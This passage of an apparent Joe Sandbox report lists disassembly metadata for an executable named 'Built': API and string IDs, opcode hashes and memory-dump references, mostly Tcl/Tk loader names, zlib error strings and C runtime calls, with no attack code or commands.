                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                      • API String ID: 190572456-3427451314
                                                                      • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                      • Instruction ID: 9f4e4e738d44f46ad2e55ab6ebf46b83c2bc2b25c6657284d3a78060318321bb
                                                                      • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                      • Instruction Fuzzy Hash: EFE17768D3DB03D1EA59FB14A9501B4A3A5AF8C792FD4103ACC1D06BA6FF7CB5488670
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 808467561-2761157908
                                                                      • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                      • Instruction ID: 79f1460d613a656cbce3d52f96edd7243015ddad6a39da682bad04bbfb688e09
                                                                      • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                      • Instruction Fuzzy Hash: 48B2D272A2C292CAF724AF65D4407F9B7A1FB58389F805135DE0D57E96EB38E900CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                      • API String ID: 0-2665694366
                                                                      • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                      • Instruction ID: 1d2301548f859a243391e01f5c30640a15d940abfa5e1034b00205bd8af7627a
                                                                      • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                      • Instruction Fuzzy Hash: DE52F672A286A58BE7549F14C458B7D7BE9FB84344F81413DEA4A87B81EB3CD940CF60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                      • Instruction ID: 8d9d8a933923093185c47f1eb5d5062bc5fa43f7293ddd6cb9ae882ba88b93ca
                                                                      • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                      • Instruction Fuzzy Hash: EF312172618B81C5EB60AF60E8807FD7364FB48745F444039DA4D47B95EF38D548CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ErrorFormatLast
                                                                      • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                      • API String ID: 3971115935-1149178304
                                                                      • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                      • Instruction ID: dc1cf27e58306d8152ba49d9e342c357a3e727a90219720369369e1d754be31e
                                                                      • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                      • Instruction Fuzzy Hash: 5321FF7262CB86C2E720BB10F4516DAB365FB88785F800136EE8D53E99EF7CD5468B50
                                                                      APIs
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E4F55
                                                                        • Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC
                                                                        • Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                        • Part of subcall function 00007FF76D5D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C19
                                                                        • Part of subcall function 00007FF76D5D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C3E
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E4F44
                                                                        • Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51BA
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51CB
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51DC
                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1458651798-0
                                                                      • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                      • Instruction ID: de8003d49b5fee1363dccf334329b06382036a61e58d742a96b94429c9cbb468
                                                                      • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                      • Instruction Fuzzy Hash: 9AD18C26E2C252C6E724BF26D8511B9A7A1EF88B84FC44135EE4D47A96FF3CE441C760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                      • Instruction ID: ac4028a1de4663d90789a5a4f941f7ecf2165661c67e79deb3bba9e96551ecee
                                                                      • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                      • Instruction Fuzzy Hash: A9314F32628B81C5DB60EF25E8502AEB3A4FB88755F940139EE9D47B56EF38D145CB20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2227656907-0
                                                                      • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                      • Instruction ID: dd639588ca415a33586a40ada6433f0ff477c77c3d87df152ecc0dfd81fe59c7
                                                                      • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                      • Instruction Fuzzy Hash: D1B1B422B2C692C1EA60BB2A95101B9E391EB58BE4FC45132ED5D47FD6EF3CE441C720
                                                                      APIs
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51BA
                                                                        • Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51CB
                                                                        • Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51DC
                                                                        • Part of subcall function 00007FF76D5E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48EC
                                                                        • Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                      • String ID:
                                                                      • API String ID: 2248164782-0
                                                                      • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                      • Instruction ID: aa6c6b4cae37d3970b30fe50c24a69c96ebd3c86faf7b45a272d96d7fc422627
                                                                      • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                      • Instruction Fuzzy Hash: 67514B32E2C642C6E724FF21E9915B9A761AB4C784FC44539EE4D47A97EF3CE4408B60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                      • Instruction ID: f0afdc3d5d5b05beda3da0936d3a40748ff4e0c8b6a0eda82b7508a2a39b0d53
                                                                      • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                      • Instruction Fuzzy Hash: 7D114F22B28B05C9EB00AB60E8442B973A4FB59759F440E31DE6D86BA5EF78D1548350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                      • Instruction ID: 72b1b63e13c9acf109fc5a2181a5db1a71b7aad057881c3a8c3bb5912b73ae41
                                                                      • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                      • Instruction Fuzzy Hash: 23C1C372B2C286C7E724AF19A044A6AF791F788785F848135DF4A47B65EE3DE801CB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                      • API String ID: 0-1127688429
                                                                      • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                      • Instruction ID: dbc86893894f832867a786ffeab7525c8898b8f349c3b28d1f02af28eddd2567
                                                                      • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                      • Instruction Fuzzy Hash: 95F1B372A2C3C5CBE7A5AB05C088A3ABAA9FF44749F45513CDE4907B92DB38D540CF60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                      • Instruction ID: 649eb230ceb17d1999d7a057f0f5860260487cc9000d3d68a89ca7e9da382c17
                                                                      • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                      • Instruction Fuzzy Hash: 96B18B73618B88CBE715EF29C8463687BA0F788B48F188932DE5D83BA5DB39D451C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $
                                                                      • API String ID: 0-227171996
                                                                      • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                      • Instruction ID: 979b88c925cb8a9363d76692c291f42dfbb81031ba2ab6d5bd0eebf7f50b8a81
                                                                      • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                      • Instruction Fuzzy Hash: CDE1C732A2D642C6EB78AE15C160139B360FF45B48F944135DE6E07B96EF39D842C778
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: incorrect header check$invalid window size
                                                                      • API String ID: 0-900081337
                                                                      • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                      • Instruction ID: 852ef9ea1e9655366a6077c4ab5073d47ef758f14f7623db43a1023c49575360
                                                                      • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                      • Instruction Fuzzy Hash: 31918372A2C2C6C7E7A49B14C488B7E7AA9FB44345F51413DEE4A47AC1EB38E540CF61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 0-3030954782
                                                                      • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                      • Instruction ID: 64e172a6924ab9a02530f0a7a4add7e0a4fbdbeb6c04cb98aca9ccd091dfbe65
                                                                      • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                      • Instruction Fuzzy Hash: 4E515C62B2C3C5C6E724DE359811769E791E784794F889232CF6887EC6EE3DD4448B24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfffffff
                                                                      • API String ID: 0-1523873471
                                                                      • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                      • Instruction ID: e5f832655157ce572f697e2617fdce3f8b20c27b6b1a36821e8f3f022ae4058d
                                                                      • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                      • Instruction Fuzzy Hash: CDA16762B2C7C6C6EB21DB25A0207B9BB94EB95B84F448032DE5D47B82FE3DD501C720
                                                                      Strings
                                                                      Memory Dump Source
